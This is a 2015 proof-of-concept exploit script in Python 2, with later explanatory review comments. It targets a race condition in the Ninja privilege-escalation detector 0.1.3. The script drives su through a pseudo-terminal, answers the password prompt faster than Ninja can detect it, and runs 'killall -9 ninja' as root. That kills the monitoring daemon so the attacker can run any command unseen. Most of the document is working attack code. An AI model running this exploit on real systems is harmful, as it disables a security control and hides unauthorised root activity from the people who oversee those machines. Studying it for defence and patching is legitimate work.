#[Title] Ninja privilege escalation detection and prevention system race condition
|
|
#[Author] Ben 'highjack' Sheppard
|
|
#[URL] http://highjack.github.io/
|
|
#[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
|
|
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
|
|
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
|
|
#[Software Link] http://forkbomb.org/ninja/
|
|
#[Date] 29/04/2015
|
|
#[Version] 0.1.3
|
|
#[Tested on] Kali Linux
|
|
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
|
|
|
|
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
|
|
#https://www.youtube.com/watch?v=eA136fOsSeQ
|
|
|
|
import pty, os, sys, subprocess
|
|
# Fork with a fresh pseudo-terminal. In the child `pid` is 0 and the pty is its
# controlling terminal, so an interactive `su` started there reads its password
# from that terminal; in the parent `pid` is the child's process id and `fd` is
# the master side of the pty, which the parent uses to type the password.
pid, fd = pty.fork()

#begin config
# Account that `su` switches to.
user = "root"
# Password typed into the pty when `su` prompts. It is stored in clear text in
# this script, so the file itself is as sensitive as the credential.
password = "mypassword" #change this :)
# Command passed to `su -c` once the switch succeeds; here it stops the
# detection daemon before it can react (the race window described above).
command = "killall -9 ninja"
#end config
|
|
#end config
|
|
|
|
|
|
def usage():
    """Write the banner (ASCII-art logo plus the advisory header) to stdout."""
    banner = """
@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@
@@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@
@@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@
!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!!
@!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@!
!!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!!
!!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!!
:!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:!
:: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: :::
: : : : :: :: : : : : : ::: : : : :: :: : : :::

[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/

[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
"""
    # The original used a print statement, which appends one newline; mirror
    # that explicitly so the output is byte-identical.
    sys.stdout.write(banner + "\n")
|
|
|
|
|
|
# Number of completed kill attempts. Read by check_procs(); the main loop at the
# bottom of the file is meant to increment it between attempts.
executions = 0
|
|
def check_procs():
    """Report whether a root-owned process mentioning /sbin/ninja is listed.

    Runs `ps aux | grep root | grep /sbin/ninja` and returns True when that
    pipeline produces any output, False when it produces none.

    Side effect: when the daemon is still listed and the module-global
    `executions` is non-zero (at least one kill attempt already happened),
    the script exits with status 0 instead of returning.

    NOTE(review): the first two pipeline stages are never waited on or closed,
    so their pipe ends stay open until the interpreter exits.
    """
    ps = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
    by_user = subprocess.Popen(["grep", "root"], stdin=ps.stdout, stdout=subprocess.PIPE)
    by_name = subprocess.Popen(["grep", "/sbin/ninja"], stdin=by_user.stdout, stdout=subprocess.PIPE)
    listing = by_name.communicate()[0]

    # Nothing matched: the daemon is not (or no longer) in the process table.
    if listing == "":
        return False

    # Daemon still present after a previous attempt: give up.
    if executions != 0:
        sys.exit(0)
    return True
|
|
|
|
def kill_ninja():
    """Drive one `su` attempt through the pty created by pty.fork() above.

    Child (pid == 0): replace the process image with `su <user> -c <command>`.
    Because the child's controlling terminal is the pty, su's password prompt
    is answered by the parent. On success this branch never returns.

    Parent (pid > 0): read the prompt, write the password, read once more,
    wait for the child, then close the master descriptor. Any exception in
    that sequence -- including a second call after `fd` has already been
    closed -- lands in the bare `except`, which prints the banner and exits
    with status 0. Nothing here checks whether su or the command actually
    succeeded, so the "terminated" message is not evidence of success.
    """
    if pid == 0:
        os.execvp("su", ["su", user, "-c", command])
    elif pid > 0:
        try:
            # Consume whatever su writes first (presumably the password
            # prompt); blocks until at least one byte is available.
            os.read(fd, 1024)
            # Answer the prompt. Replying quickly is the whole point of the
            # PoC: it is meant to land inside the detector's polling delay.
            os.write(fd, password + "\n")
            # Drain any further output before reaping the child.
            os.read(fd,1024)
            os.wait()
            os.close(fd)
        except:
            # Bare except: also swallows SystemExit/KeyboardInterrupt, and is
            # reached on any read/write/wait failure, not only after a kill.
            usage()
            print "[+] Ninja is terminated"
            sys.exit(0)
|
|
|
|
|
|
# Main loop. `check_procs == True` compares the function object itself with
# True (no call), so the condition is always False: check_procs() is never
# invoked and `executions` is never incremented. In practice the parent runs
# kill_ninja() once, and the second call fails on the already-closed pty
# descriptor, which is the path that ends the script (see the except branch
# in kill_ninja()). The child never reaches this loop: it exec()s into su.
while True:
    kill_ninja()
    if (check_procs == True):
        executions = executions + 1
        kill_ninja()